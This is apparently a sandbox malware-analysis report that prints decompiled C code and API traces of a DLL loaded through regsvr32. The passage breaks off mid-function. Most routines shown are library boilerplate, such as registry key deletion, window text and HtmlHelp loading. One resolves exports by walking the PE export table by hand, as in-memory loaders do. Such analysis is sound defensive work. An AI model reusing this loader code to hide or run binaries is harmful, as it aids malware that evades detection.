                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bcf1
                                                                                                                                                                            0x1000bcf7
                                                                                                                                                                            0x1000bcfb
                                                                                                                                                                            0x1000bd07
                                                                                                                                                                            0x1000bd13
                                                                                                                                                                            0x1000bd17
                                                                                                                                                                            0x1000bd1d
                                                                                                                                                                            0x1000bd21
                                                                                                                                                                            0x1000bd28
                                                                                                                                                                            0x1000bd2a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd2a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd28
                                                                                                                                                                            0x1000bd4b
                                                                                                                                                                            0x1000bd51
                                                                                                                                                                            0x1000bd5b
                                                                                                                                                                            0x1000bd66
                                                                                                                                                                            0x1000bd53
                                                                                                                                                                            0x1000bd53
                                                                                                                                                                            0x1000bd59
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000bd59
                                                                                                                                                                            0x1000bd6b
                                                                                                                                                                            0x1000bd6b
                                                                                                                                                                            0x1000bd76
                                                                                                                                                                            0x1000bd7e
                                                                                                                                                                            0x1000bd7f
                                                                                                                                                                            0x1000bd80
                                                                                                                                                                            0x1000bd89
                                                                                                                                                                            0x1000bd8e
                                                                                                                                                                            0x1000bd95

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1000BCA8
                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1000BCC7
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BCE5
                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 1000BD60
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 1000BD6B
                                                                                                                                                                              • Part of subcall function 10009FA3: __EH_prolog3.LIBCMT ref: 10009FAA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 301487041-0
                                                                                                                                                                            • Opcode ID: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                                                                                            • Instruction ID: 653bf45c983c6aa9a2c45ec2c29e65d920d70d1e6a7a13c67c9db93679124605
                                                                                                                                                                            • Opcode Fuzzy Hash: 39e7eb00d6dc938df27b9e03ef33bae49a28eb95fe07434f2e98046a2569245b
                                                                                                                                                                            • Instruction Fuzzy Hash: 0921A075D0465A9FEB21DF94CC81AEDB7B0FF04390F104126ED55A7290EB705E44DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E10013F9E(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				char _v263;
                                                                                                                                                                            				char _v264;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                            				struct HWND__* _t21;
                                                                                                                                                                            				void* _t22;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				int _t27;
                                                                                                                                                                            				CHAR* _t28;
                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                            
                                                                                                                                                                            				_t25 = __edx;
                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                            				_t9 =  *0x10057a08; // 0xf0ed3d8b
                                                                                                                                                                            				_v8 = _t9 ^ _t29;
                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                            				_t32 = _t21;
                                                                                                                                                                            				_t28 = _a8;
                                                                                                                                                                            				if(_t21 == 0) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					E1000A0DB(_t21, _t22, _t26, _t28, _t32);
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                            					goto L1;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t27 = lstrlenA(_t28);
                                                                                                                                                                            				_v264 = 0;
                                                                                                                                                                            				E100174D0(_t27,  &_v263, 0, 0xff);
                                                                                                                                                                            				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                                                                                            					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                                                                                            			}


















                                                                                                                                                                            0x10013f9e
                                                                                                                                                                            0x10013f9e
                                                                                                                                                                            0x10013fa7
                                                                                                                                                                            0x10013fae
                                                                                                                                                                            0x10013fb2
                                                                                                                                                                            0x10013fb5
                                                                                                                                                                            0x10013fb8
                                                                                                                                                                            0x10013fbc
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fbe
                                                                                                                                                                            0x10013fc5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10013fd3
                                                                                                                                                                            0x10013fde
                                                                                                                                                                            0x10013fe5
                                                                                                                                                                            0x10013ff4
                                                                                                                                                                            0x1001401d
                                                                                                                                                                            0x1001401d
                                                                                                                                                                            0x10014031

                                                                                                                                                                            APIs
                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
                                                                                                                                                                            • _memset.LIBCMT ref: 10013FE5
                                                                                                                                                                            • GetWindowTextA.USER32 ref: 10013FFF
                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,?), ref: 10014011
                                                                                                                                                                            • SetWindowTextA.USER32(?,?), ref: 1001401D
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4273134663-0
                                                                                                                                                                            • Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                                                                                            • Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
                                                                                                                                                                            • Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
                                                                                                                                                                            • Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                            				intOrPtr _v0;
                                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				struct HINSTANCE__* _t16;
                                                                                                                                                                            				_Unknown_base(*)()* _t17;
                                                                                                                                                                            				void* _t25;
                                                                                                                                                                            				void* _t26;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __eflags;
                                                                                                                                                                            				_t24 = __edi;
                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                            				E1001431B(__ebx, _t25, __ebp, 0xc);
                                                                                                                                                                            				_push(E100100DE);
                                                                                                                                                                            				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
                                                                                                                                                                            				_t29 = _t26;
                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                            					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 =  *(_t26 + 8);
                                                                                                                                                                            				if( *(_t26 + 8) != 0) {
                                                                                                                                                                            					L7:
                                                                                                                                                                            					E10014388(0xc);
                                                                                                                                                                            					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_push("hhctrl.ocx");
                                                                                                                                                                            					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
                                                                                                                                                                            					 *(_t26 + 4) = _t16;
                                                                                                                                                                            					if(_t16 != 0) {
                                                                                                                                                                            						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                                                                                            						__eflags = _t17;
                                                                                                                                                                            						 *(_t26 + 8) = _t17;
                                                                                                                                                                            						if(_t17 != 0) {
                                                                                                                                                                            							goto L7;
                                                                                                                                                                            						}
                                                                                                                                                                            						FreeLibrary( *(_t26 + 4));
                                                                                                                                                                            						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                                                                                            					}
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            			}











                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c0f
                                                                                                                                                                            0x10010c12
                                                                                                                                                                            0x10010c17
                                                                                                                                                                            0x10010c26
                                                                                                                                                                            0x10010c28
                                                                                                                                                                            0x10010c2a
                                                                                                                                                                            0x10010c2c
                                                                                                                                                                            0x10010c2c
                                                                                                                                                                            0x10010c31
                                                                                                                                                                            0x10010c35
                                                                                                                                                                            0x10010c6f
                                                                                                                                                                            0x10010c71
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c37
                                                                                                                                                                            0x10010c37
                                                                                                                                                                            0x10010c3c
                                                                                                                                                                            0x10010c44
                                                                                                                                                                            0x10010c47
                                                                                                                                                                            0x10010c53
                                                                                                                                                                            0x10010c59
                                                                                                                                                                            0x10010c5b
                                                                                                                                                                            0x10010c5e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c63
                                                                                                                                                                            0x10010c69
                                                                                                                                                                            0x10010c69
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10010c49

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                                                                                              • Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                                                                                              • Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                                                                                              • Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                                                                                              • Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 10010C63
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                                                                            • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                                            • API String ID: 2853499158-63838506
                                                                                                                                                                            • Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                                                                                            • Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
                                                                                                                                                                            • Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
                                                                                                                                                                            • Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                            			E100224E9() {
                                                                                                                                                                            				signed long long _v12;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed long long _v28;
                                                                                                                                                                            				signed char _t8;
                                                                                                                                                                            
                                                                                                                                                                            				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                            					L6:
                                                                                                                                                                            					_v20 =  *0x1002bb98;
                                                                                                                                                                            					_v28 =  *0x1002bb90;
                                                                                                                                                                            					asm("fsubr qword [ebp-0x18]");
                                                                                                                                                                            					_v12 = _v28 / _v20 * _v20;
                                                                                                                                                                            					asm("fld1");
                                                                                                                                                                            					asm("fcomp qword [ebp-0x8]");
                                                                                                                                                                            					asm("fnstsw ax");
                                                                                                                                                                            					if((_t8 & 0x00000005) != 0) {
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						return 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                                                                            					if(__eax == 0) {
                                                                                                                                                                            						goto L6;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_push(0);
                                                                                                                                                                            						return __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x100224ee
                                                                                                                                                                            0x100224f6
                                                                                                                                                                            0x1002250d
                                                                                                                                                                            0x100224b9
                                                                                                                                                                            0x100224c2
                                                                                                                                                                            0x100224ce
                                                                                                                                                                            0x100224d1
                                                                                                                                                                            0x100224d4
                                                                                                                                                                            0x100224d6
                                                                                                                                                                            0x100224d9
                                                                                                                                                                            0x100224de
                                                                                                                                                                            0x100224e8
                                                                                                                                                                            0x100224e0
                                                                                                                                                                            0x100224e4
                                                                                                                                                                            0x100224e4
                                                                                                                                                                            0x100224f8
                                                                                                                                                                            0x100224fe
                                                                                                                                                                            0x10022506
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10022508
                                                                                                                                                                            0x10022508
                                                                                                                                                                            0x1002250c
                                                                                                                                                                            0x1002250c
                                                                                                                                                                            0x10022506

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                                                                            • Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                                                                                            • Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
                                                                                                                                                                            • Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
                                                                                                                                                                            • Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                            				intOrPtr* _v32;
                                                                                                                                                                            				signed short* _v36;
                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                            				void* _t79;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            
                                                                                                                                                                            				_v40 = __ecx;
                                                                                                                                                                            				_v20 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                            				_v16 =  *_a4 + 0x78;
                                                                                                                                                                            				if( *((intOrPtr*)(_v16 + 4)) != 0) {
                                                                                                                                                                            					_v8 = _v20 +  *_v16;
                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                                                                                            						SetLastError(0x7f);
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                                                                                            							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                                                                                            							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                                                                                            							_v24 = 0;
                                                                                                                                                                            							_v28 = 0;
                                                                                                                                                                            							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
                                                                                                                                                                            								_t79 = E10001F70(_a8, _v20 +  *_v32);
                                                                                                                                                                            								_t119 = _t119 + 8;
                                                                                                                                                                            								if(_t79 != 0) {
                                                                                                                                                                            									_v28 = _v28 + 1;
                                                                                                                                                                            									_v32 = _v32 + 4;
                                                                                                                                                                            									_v36 =  &(_v36[1]);
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								_v12 =  *_v36 & 0x0000ffff;
                                                                                                                                                                            								_v24 = 1;
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_v24 != 0) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                                                                                            									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                                                                                            								}
                                                                                                                                                                            								SetLastError(0x7f);
                                                                                                                                                                            								return 0;
                                                                                                                                                                            							}
                                                                                                                                                                            							SetLastError(0x7f);
                                                                                                                                                                            							return 0;
                                                                                                                                                                            						}
                                                                                                                                                                            						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                                                                                            							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            							goto L17;
                                                                                                                                                                            						}
                                                                                                                                                                            						SetLastError(0x7f);
                                                                                                                                                                            						return 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				SetLastError(0x7f);
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}














                                                                                                                                                                            0x10002d56
                                                                                                                                                                            0x10002d5f
                                                                                                                                                                            0x10002d62
                                                                                                                                                                            0x10002d71
                                                                                                                                                                            0x10002d7b
                                                                                                                                                                            0x10002d94
                                                                                                                                                                            0x10002d9e
                                                                                                                                                                            0x10002dab
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002db8
                                                                                                                                                                            0x10002dc3
                                                                                                                                                                            0x10002e0b
                                                                                                                                                                            0x10002e17
                                                                                                                                                                            0x10002e1a
                                                                                                                                                                            0x10002e21
                                                                                                                                                                            0x10002e45
                                                                                                                                                                            0x10002e5d
                                                                                                                                                                            0x10002e62
                                                                                                                                                                            0x10002e67
                                                                                                                                                                            0x10002e30
                                                                                                                                                                            0x10002e39
                                                                                                                                                                            0x10002e42
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e42
                                                                                                                                                                            0x10002e6f
                                                                                                                                                                            0x10002e72
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e72
                                                                                                                                                                            0x10002e81
                                                                                                                                                                            0x10002e8f
                                                                                                                                                                            0x10002e98
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002eb5
                                                                                                                                                                            0x10002e9c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002ea2
                                                                                                                                                                            0x10002e85
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002e8b
                                                                                                                                                                            0x10002dd7
                                                                                                                                                                            0x10002dfa
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002dfa
                                                                                                                                                                            0x10002ddb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002de1
                                                                                                                                                                            0x10002d9e
                                                                                                                                                                            0x10002d7f
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 10002D7F
                                                                                                                                                                            • SetLastError.KERNEL32(0000007F), ref: 10002DAB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.253870105.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.253866007.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253889741.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253898750.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253918411.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253924395.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000002.00000002.253930232.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                            • Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                                                                                            • Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
                                                                                                                                                                            • Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                                                                                            • Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                            				char _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				char _t43;
                                                                                                                                                                            				char _t46;
                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                            				intOrPtr _t57;
                                                                                                                                                                            				int _t58;
                                                                                                                                                                            				signed short* _t59;
                                                                                                                                                                            				short* _t60;
                                                                                                                                                                            				int _t65;
                                                                                                                                                                            				char* _t72;
                                                                                                                                                                            
                                                                                                                                                                            				_t72 = _a8;
                                                                                                                                                                            				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if( *_t72 != 0) {
                                                                                                                                                                            						E10016E2B( &_v20, __edi, _a16);
                                                                                                                                                                            						_t43 = _v20;
                                                                                                                                                                            						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                            						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                            							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                            							if(_t46 == 0) {
                                                                                                                                                                            								__eflags = _a4;
                                                                                                                                                                            								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                                                                                            								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                            									L10:
                                                                                                                                                                            									__eflags = _v8;
                                                                                                                                                                            									if(_v8 != 0) {
                                                                                                                                                                            										_t53 = _v12;
                                                                                                                                                                            										_t11 = _t53 + 0x70;
                                                                                                                                                                            										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                            										__eflags =  *_t11;
                                                                                                                                                                            									}
                                                                                                                                                                            									return 1;
                                                                                                                                                                            								}
                                                                                                                                                                            								L21:
                                                                                                                                                                            								_t54 = E10017D62(__eflags);
                                                                                                                                                                            								 *_t54 = 0x2a;
                                                                                                                                                                            								__eflags = _v8;
                                                                                                                                                                            								if(_v8 != 0) {
                                                                                                                                                                            									_t54 = _v12;
                                                                                                                                                                            									_t33 = _t54 + 0x70;
                                                                                                                                                                            									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                            									__eflags =  *_t33;
                                                                                                                                                                            								}
                                                                                                                                                                            								return _t54 | 0xffffffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t56 = _v20;
                                                                                                                                                                            							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                                                                                            							_t65 =  *_t15;
                                                                                                                                                                            							__eflags = _t65 - 1;
                                                                                                                                                                            							if(_t65 <= 1) {
